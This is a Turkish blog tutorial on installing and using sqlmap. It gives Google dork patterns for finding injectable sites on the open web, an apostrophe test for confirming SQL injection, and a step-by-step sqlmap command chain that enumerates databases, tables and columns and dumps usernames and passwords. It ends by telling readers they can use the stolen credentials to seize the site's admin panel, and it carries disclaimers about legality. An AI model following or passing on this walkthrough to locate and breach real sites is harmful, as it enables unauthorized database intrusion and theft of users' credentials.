1. Ana Sayfa
  2. Teknoloji
  3. Sqlmap Nedir Ve Nasıl Kullanılır?
Trendlerdeki Yazı

Sqlmap Nedir Ve Nasıl Kullanılır?

sqlmap nedir ve nasıl kullanılır

SQLmap, sızma testinde SQL açıklarını tespit etmek ve kullanmak için kullanılan açık kaynak kodlu bir araçtır. SQLmap, SQL açıklarını algılama ve sızma sürecini otomatikleştirir. SQL Enjeksiyon saldırıları, SQL kullanan veritabanlarının kontrolünü ele geçirebilir. MySQL, SQL Server, Oracle ve diğerleri gibi kendisine bağlı bir SQL veritabanına sahip olabilecek herhangi bir web sitesini veya web uygulamasını ele geçirebilir. Bu veritabanları genellikle müşteri bilgileri, kişisel veriler, ticari rakamlar, finansal veriler vb. gibi hassas verileri içerebilir. SQL güvenlik açıklarını bulabilmek ve bunlara karşı savunma yapabilmek hayati önem taşımaktadır. SQLmap bu güvenlik açıklarını bulmanıza ve açıkları istismar etmenize yardımcı olur.

Bu yazımızda anlattıklarımız tamamen bilgilendirme amaçlıdır. Kesinlikle sistemlere zarar vermeniz yasak ve suçtur. Herhangi bir yerde sistemde anlattıklarımızı denerseniz yapıcaklarınızdan kesinlikle biz sorumlu değiliz!

Sqlmap Nasıl Kurulur?

Linux ve Windows için Sqlmap kurulumu ve kullanımı anlatılmıştır. Aşşağıya inerek okumaya devam edebilirsiniz.

Linux Sqlmap Kurulumu!

Linux Sqlmap Nasıl Kurulur?
Linux Sqlmap Nasıl Kurulur?

Öncelikle Terminali açıyoruz ve aşşağıdaki komutu giriyoruz.

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap

Bu komutu girdikten sonra gerekli dosyalar Linux sisteminize kurulucaktır ve artık Sqlmap kullanımına hazırsınız.

Windows Sqlmap Kurulumu!

Windows Sqlmap Nasıl Kurulur?
Windows Sqlmap Nasıl Kurulur?

Windows Sqlmap kurulumu için öncelikle Python indirmemiz gerekiyor. Aşşağıdaki linklerden Python indirdikten sonra diğer adımlara geçersiniz.

PYTHON İNDİRMEK İÇİN TIKLA!

Windows Sqlmap kurulumu
Windows Sqlmap kurulumu
  • Yukarıdaki görselde gördüğünüz gibi Python 3 ve Python 2’yi indirdikten sonra kurulumunu gerçekleştirin.
  • Sqlmap resmi sitesine sqlmap.org giderek aşşağıdaki görseldeki gibi sağ taraftan .zip olarak indirin.
Windows Sqlmap kurulumu
  • İndirdiğiniz Sqlmap .zip dosyasını Masaüstüne çıkartın.

Komut istemcinizi CMD’yi yönetici olarak açın.

Sqlmap’ı başlatmak için sırasıyla aşşağıdaki komutları CMD’ye girin.

cd Desktop
cd sqlmap
sqlmap.py

Artık Sqlmap kurulumu bitti.

SQL Açığı Nasıl Bulunur?

Sql açıkları bazen şans eseri karşınıza çıkabilir ama çoğu zaman SQL açığa uygun dorklarla bulunması mümkündür. Dorkların çeşitleri vardır örneğin wordpress dorkları joomla dorkları sql dorkları vb. bu listeyi daha uzatabilirsiniz. Dorkdaki amaç sizin SQL açığınıza uygun arama sonuçlarına ulaştırması. Aşşağıda dork örnekleri verilmiştir sizde istediğiniz herhangi birini seçip Google’da deneyebilirsiniz. Şimdilik aşşağıda olan dorklarla yetinebilirsiniz, eğer az gelirse google SQL dork yazarak binlercesini bulabilirsiniz.

Örnek Google SQL Dorklar

play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
room-detail.php?id=

Bu dorkların sonuçlarında hedef bir site mutlaka çıkıcaktır sabırlı olun. Karşınıza çıkan sitenin SQL açıklı olduğunu şöyle anlayabilirsiniz.

http://testphp.vulnweb.com/listproducts.php?cat=1

Bu URL normal bir URL olarak gözukuyor ama 1 sayısının yanına ‘(kesme işareti) eklediğinizde eğer hata veriyorsa o site SQL açığı mevcuttur.Örnek bir fotoğraf aşşağıda verilmiştir.

http://testphp.vulnweb.com/listproducts.php?cat=1

SQL Açıklı Sitenin Bulunması

Kesme işaretli hali ile SQL hatası verince aşşağıdakine benzer hata çıktısı alabilirsiniz.

Gördüğünüz gibi hata verdi demek ki bu sitede bir SQL açığı mevcut. Unutmayın her bulduğunuz SQL açığı ile site hackleyemezsiniz. Çünkü bazen veritabanı şifreleri SHA-256, MD5 vb. şifreleme ile karşınıza çıkabilir ve kırılması zordur.

SQL Açıklı Site Nasıl Hacklenir?

Öncelikle SQL açıklı sitemizin SQL açık gösterilmeden önceki halini kopyalayım.

Örnek: http://testphp.vulnweb.com/listproducts.php?cat=1

Sqlmap açıktıktan sonra ilk testimizi yapalım. Aşşağıdaki komutu yazalım.

Sqlmap Veritabanı Bulunması
Sqlmap Veritabanı Bulunması
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” --dbs

Bu komutu yazdıktan sonra tamamlanmasını bekliyoruz. Tamamlandıktan sonra karşınıza veritabanları çıkıcaktır.

O veritabanlarından sitenin şifresinin, kullanıcılarının olduğunu düşündüğünüz veritabanın adını kopyalayın ve kırmızı olarak belirtiğim yere ekleyin ve ardından aşşağıdaki komutları yazın.

Sqlmap Veritabanı Tablolarını Çekme
Sqlmap Veritabanı Tablolarını Çekme
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D veritabaniadi --tables

Bu işlemde tamamlandıktan sonra karşınıza veritabanı tablolar çıkıcaktır kullanıcılar,musteriler vb. tabloların birini seçin ve adını kopyalayın. Kopyaladıktan sonra yeni adımda o tabloyu kırmızı belirttiğim yere yapıştırabilirsiniz.

Sqlmap ile Veritabanı Kolonlarını Çekme
Sqlmap ile Veritabanı Kolonlarını Çekme
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D veritabaniadi -T veritabanıtablosu --columns

Ardından tamamlandıktan sonra karşınıza kolonlar çıkıcaktır. Users, passwords, kullanici, şifre vb. şeyler olabilir farketmez siz hangisine ulaşmak istiyorsanız onu aşşağıdaki komutta kırmızı belirttiğim yere virgül ile çoklu olarak bulabilirsiniz. Aşşağıdaki komutu uygulayalım ve sonuçları görelim.

Sqlmap SQL Açıklı Sitenin Bilgilerine Ulaşmak!
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D veritabaniadi -T veritabanıtablosu -C kullanici,parola --dump

Artık sızdığınız sitenin kullanıcı adı, şifre, email vb.bilgileri elinize geçmiştir. Bazılarınıza direk normal olarak şifreler elinize geçebilir bazılarınıza ise SHA-256, MD5 gibi şifrelenerek geçmiş olabilir ama çok zor bunların kırılması, zaman isteyen bir süreç diyelim. Artık sitede istediğinizi yapabilirsiniz admin panel bularak elinizdeki bilgiler ile siteyi ele geçirebilirsiniz. Bu içerik kesinlikle kötü şekilde kullanılmamalı, eğitim için yazılmıştır. Bilinçli olmakta fayda var. Pentest yapılması site sahibinin izniyle gerçekleşmelidir, aksi takdirde yasaklı ve suç teşkil ediyor. Sağlıcakla kalın bir sonraki yazımızda görüşmek üzere.

Yorum Yap

Yazar Hakkında

Ömer iyi çocuktu ama fena bir kusuru vardı. İnsanlara fazla güveniyordu. Sırf seviyor diye onları tanıdığını zannediyordu. Eğer geri dönüp söyleyebilseydim söylerdim. Ömer derdim her ihanet sevgi ile başlar.

Yorum Yap